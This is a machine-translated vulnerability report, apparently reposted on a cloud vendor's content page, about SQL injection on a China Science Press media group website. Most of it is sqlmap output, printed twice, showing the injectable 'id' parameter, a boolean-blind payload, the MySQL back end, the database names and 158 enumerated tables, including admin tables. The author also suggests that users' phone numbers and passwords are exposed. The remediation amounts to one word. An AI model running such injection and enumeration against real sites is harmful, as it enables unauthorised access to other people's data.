SQL Injection in a media group of China Science Press

Source: Internet
Author: User
Tags sybase

SQL Injection in a media group of China Science Press

Good security ,,,,

Detailed description:

Root @ attack :~ # Sqlmap-u "http: // **. **/s_second.php? Id = 28"

_

___ | _____ ___ {1.0-dev-nongit-20150918}

| _-|. |. '|. |

| ___ | _ |__, | _ |

| _ | Http ://**.**.**.**



[!] Legal disclagal: Usage of sqlmap for attacking targets without prior mutual consent is illegal. it is the end user's responsibility to obey all applicable local, state and federal laws. developers assume no liability and are not responsible for any misuse or damage caused by this program



[*] Starting at 18:58:47



[18:58:48] [INFO] testing connection to the target URL

[18:58:51] [INFO] heuristics detected web page charset 'gb2312'

[18:58:54] [WARNING] reflective value (s) found and filtering out

[18:58:55] [INFO] testing if the target URL is stable

[18:58:59] [INFO] target URL is stable

[18:58:59] [INFO] testing if GET parameter 'id' is dynamic

[18:58:59] [INFO] confirming that GET parameter 'id' is dynamic

[18:58:59] [WARNING] GET parameter 'id' does not appear dynamic

[18:58:59] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable

[18:58:59] [INFO] testing for SQL injection on GET parameter 'id'

[18:59:00] [INFO] testing 'AND boolean-based blind-WHERE or HAVING clause'

[18:59:07] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind-WHERE or HAVING clause 'injectable

[18:59:07] [INFO] testing 'mysql> = 5.0 AND error-based-WHERE, HAVING, order by or group by clause'

[18:59:07] [INFO] testing 'postgresql AND error-based-WHERE or HAVING clause'

[18:59:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based-WHERE or HAVING Claus'

[18:59:07] [INFO] testing 'oracle AND error-based-WHERE or HAVING clause (XMLType )'

[18:59:07] [INFO] testing 'mysql> = 5.0 error-based-Parameter replace'

[18:59:14] [INFO] heuristics detected web page charset 'iso-8859-2'

[18:59:16] [INFO] testing 'mysql inline querys'

[19:00:09] [WARNING] there is a possibility that the target (or WAF) is dropping 'suspicmy' requests

[19:00:09] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request

[19:00:23] [INFO] testing 'postgresql inline querys'

[19:00:33] [INFO] testing 'Microsoft SQL Server/Sybase inline querys'

[19:00:41] [INFO] testing 'mysql> 5.0.11 stacked queries (SELECT-comment )'

[19:00:41] [WARNING] time-based comparison requires larger statistical model, please wait ............

[19:01:25] [CRITICAL] considerable lagging has been detected in connection response (s). Please use as high value for option '-- time-sec' as possible (e.g. 10 or more)

[19:01:28] [INFO] testing 'postgresql> 8.1 stacked queries (comment )'

[19:01:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment )'

[19:01:35] [INFO] testing 'oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE-comment )'

[19:01:35] [INFO] testing 'mysql> = 5.0.12 AND time-based blind (SELECT )'

[19:01:40] [INFO] testing 'postgresql> 8.1 AND time-based blind'

[19:01:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'

[19:01:46] [INFO] testing 'oracle AND time-based blind'

[19:01:47] [INFO] testing 'generic UNION query (NULL)-1 to 20 columns'

[19:01:47] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '-- dbms'

[19:01:47] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found

[19:02:34] [INFO] testing 'mysql UNION query (NULL)-1 to 20 columns'

[19:03:06] [INFO] checking if the injection point on GET parameter 'id' is a false positive

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any )? [Y/N]

Sqlmap identified the following injection point (s) with a total of 82 HTTP (s) requests:

---

Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind-WHERE or HAVING clause

Payload: id = 28 AND 2130 = 2130

---

[19:04:10] [INFO] testing MySQL

[19:04:13] [INFO] confirming MySQL

[19:04:20] [INFO] the back-end DBMS is MySQL

Web application technology: PHP 5.3.3, Apache

Back-end DBMS: MySQL> = 5.0.0

[19:04:20] [INFO] fetched data logged to text files under '/root/. sqlmap/output /**.**.**.**'

------------------------------------------------------------------

Available databases [3]:

[*] Information_schema

[*] Sciencep_db

[*] Test



[19:18:46] [INFO] fetched data logged to text files under '/root/. sqlmap/output /**.**.**.**'

-----------------------



Three databases



----------------------

[21:32:47] [INFO] the back-end DBMS is MySQL

Web application technology: PHP 5.3.3, Apache

Back-end DBMS: MySQL 5

[21:32:47] [INFO] fetching tables for database: 'sciencep _ db'

[21:32:47] [INFO] fetching number of tables for database 'sciencep _ db'

[21:32:47] [INFO] resumed: 158

[21:32:47] [INFO] resumed: 1 discountrate

[21:32:47] [INFO] resumed: 2 order

[21:32:47] [INFO] resumed: 3 orderdetail

[21:32:47] [INFO] resumed: admininfo

[21:32:47] [INFO] resumed: article_t

[21:32:47] [INFO] resumed: ci_sessions

[21:32:47] [INFO] resumed: classification

[21:32:47] [INFO] resumed: column_t

[21:32:47] [INFO] resumed: daorushujibiao

[21:32:47] [INFO] resumed: department

[21:32:47] [INFO] resumed: group_list

[21:32:47] [INFO] resumed: hxhd_addon15

[21:32:47] [INFO] resumed: hxhd_addonarticle

[21:32:47] [INFO] resumed: hxhd_addonflash

[21:32:47] [INFO] resumed: hxhd_addonimages

[21:32:47] [INFO] resumed: hxhd_addonsoft

[21:32:47] [INFO] resumed: hxhd_addonspec

[21:32:47] [INFO] resumed: hxhd_admin

[21:32:47] [INFO] resumed: hxhd_admintype

[21:32:47] [INFO] resuming partial value: hxhd_a

[21:32:47] [WARNING] running in a single-thread mode. Please consider usage of option '-- Threads' for faster data retrieval

[21:32:47] [INFO] retrieved:

[21:33:30] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request

Rc

[21:35:00] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request

Att

[21:37:11] [INFO] retrieved: hxhd _



-------------------------------------------------



There are 158 tables in the current database, and there should be a lot of leaks. I will not run them one by one.



----------------------------------------------



You can purchase the phone number from the website. The leaked mobile phone number should include the user account and password.



-----------------------------------------------------

Hope that the publishing house will send a book (C Language Programming Tutorial (second edition ))

Proof of vulnerability:

Root @ attack :~ # Sqlmap-u "http: // **. **/s_second.php? Id = 28"

_

___ | _____ ___ {1.0-dev-nongit-20150918}

| _-|. |. '|. |

| ___ | _ |__, | _ |

| _ | Http ://**.**.**.**



[!] Legal disclagal: Usage of sqlmap for attacking targets without prior mutual consent is illegal. it is the end user's responsibility to obey all applicable local, state and federal laws. developers assume no liability and are not responsible for any misuse or damage caused by this program



[*] Starting at 18:58:47



[18:58:48] [INFO] testing connection to the target URL

[18:58:51] [INFO] heuristics detected web page charset 'gb2312'

[18:58:54] [WARNING] reflective value (s) found and filtering out

[18:58:55] [INFO] testing if the target URL is stable

[18:58:59] [INFO] target URL is stable

[18:58:59] [INFO] testing if GET parameter 'id' is dynamic

[18:58:59] [INFO] confirming that GET parameter 'id' is dynamic

[18:58:59] [WARNING] GET parameter 'id' does not appear dynamic

[18:58:59] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable

[18:58:59] [INFO] testing for SQL injection on GET parameter 'id'

[18:59:00] [INFO] testing 'AND boolean-based blind-WHERE or HAVING clause'

[18:59:07] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind-WHERE or HAVING clause 'injectable

[18:59:07] [INFO] testing 'mysql> = 5.0 AND error-based-WHERE, HAVING, order by or group by clause'

[18:59:07] [INFO] testing 'postgresql AND error-based-WHERE or HAVING clause'

[18:59:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based-WHERE or HAVING Claus'

[18:59:07] [INFO] testing 'oracle AND error-based-WHERE or HAVING clause (XMLType )'

[18:59:07] [INFO] testing 'mysql> = 5.0 error-based-Parameter replace'

[18:59:14] [INFO] heuristics detected web page charset 'iso-8859-2'

[18:59:16] [INFO] testing 'mysql inline querys'

[19:00:09] [WARNING] there is a possibility that the target (or WAF) is dropping 'suspicmy' requests

[19:00:09] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request

[19:00:23] [INFO] testing 'postgresql inline querys'

[19:00:33] [INFO] testing 'Microsoft SQL Server/Sybase inline querys'

[19:00:41] [INFO] testing 'mysql> 5.0.11 stacked queries (SELECT-comment )'

[19:00:41] [WARNING] time-based comparison requires larger statistical model, please wait ............

[19:01:25] [CRITICAL] considerable lagging has been detected in connection response (s). Please use as high value for option '-- time-sec' as possible (e.g. 10 or more)

[19:01:28] [INFO] testing 'postgresql> 8.1 stacked queries (comment )'

[19:01:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment )'

[19:01:35] [INFO] testing 'oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE-comment )'

[19:01:35] [INFO] testing 'mysql> = 5.0.12 AND time-based blind (SELECT )'

[19:01:40] [INFO] testing 'postgresql> 8.1 AND time-based blind'

[19:01:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'

[19:01:46] [INFO] testing 'oracle AND time-based blind'

[19:01:47] [INFO] testing 'generic UNION query (NULL)-1 to 20 columns'

[19:01:47] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '-- dbms'

[19:01:47] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found

[19:02:34] [INFO] testing 'mysql UNION query (NULL)-1 to 20 columns'

[19:03:06] [INFO] checking if the injection point on GET parameter 'id' is a false positive

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any )? [Y/N]

Sqlmap identified the following injection point (s) with a total of 82 HTTP (s) requests:

---

Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind-WHERE or HAVING clause

Payload: id = 28 AND 2130 = 2130

---

[19:04:10] [INFO] testing MySQL

[19:04:13] [INFO] confirming MySQL

[19:04:20] [INFO] the back-end DBMS is MySQL

Web application technology: PHP 5.3.3, Apache

Back-end DBMS: MySQL> = 5.0.0

[19:04:20] [INFO] fetched data logged to text

Solution:

Filter

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.